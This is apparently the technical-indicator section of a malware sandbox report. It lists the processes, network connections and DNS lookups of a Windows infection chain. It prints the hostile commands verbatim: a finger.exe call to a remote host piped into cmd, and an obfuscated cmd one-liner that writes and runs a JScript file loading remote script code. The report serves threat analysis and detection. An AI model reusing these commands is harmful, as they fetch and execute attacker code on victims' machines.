Technical Information
- '<SYSTEM32>\finger.exe' ok@upot47lae89.employer.email
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\p9D.js"
- %LOCALAPPDATA%\p9d.js
- 'up######e89.employer.email':79
- 'wa####.#iwdwrsepcqr.date':80
- 'cl###flare.com':443
- 'microsoft.com':80
- 'up######e89.employer.email':79
- 'cl###flare.com':443
- DNS ASK up######e89.employer.email
- DNS ASK wa####.#iwdwrsepcqr.date
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
- '<SYSTEM32>\cmd.exe' /c finger ok@upot47lae89.employer.email |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt LKCW=.j&&SEt KZZPF=vnPwyarnPwy a =nPwy 'scnPwyrinPwyptnPwy:'; b =nPwy 'hnPwyTtPnPwy:'; GnPwyetnPwyObjnPwyecnPwyt(nPwya+b+'&&sET NTI2=TJTRETJTREwaaa5d.eiwdwrsepcqr.dateTJTRE?1TJTRE')...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p MF2V2="%KZZPF:nPwy=%%NTI2:TJTRE=/%" 0<nul 1>%LOCALAPPDATA%\p9D%LKCW%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\p9D%LKCW%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\p9D.js